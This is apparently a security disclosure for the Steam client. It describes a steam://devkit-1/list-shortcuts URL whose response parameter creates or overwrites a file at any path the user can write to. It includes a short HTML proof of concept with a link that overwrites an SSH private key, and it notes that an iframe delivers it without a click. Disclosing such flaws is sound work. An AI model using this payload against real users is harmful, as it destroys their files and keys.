[steam client] Opening a specific steam:// url overwrites files at an arbitrary location

If a user opens `steam://devkit-1/list-shortcuts?response=/tmp/testfile`, a file `/tmp/testfile` will be created containing the response to this request. Another problem with this is that the file will be *overwritten* if it already exists. The owner of the file will be the same as the user that runs the steam client. This also means that we can overwrite and wipe out files that the user cares about, e.g. ssh keys, documents etc as long as we know the full path to those files. POC: (the URL may also be visited with an iframe and thus doesn't require any user interaction) ``` <html> <head> <title>Steam client POC</title> </head> <body> <a href="steam://devkit-1/list-shortcuts?response=/tmp/testfile">Create /tmp/testfile</a> <a href="steam://devkit-1/list-shortcuts?response=/home/ubuntu/.ssh/id_rsa">Overwrite /home/ubuntu/.ssh/id_rsa</a> </body> </html> ``` ## Impact An attacker can overwrite and wipe out files at an arbitrary location, as long as the steam client is executed with a user that can write to those files. A user's SSH keys, documents etc may be deleted as long as the attacker knows the full path to those files.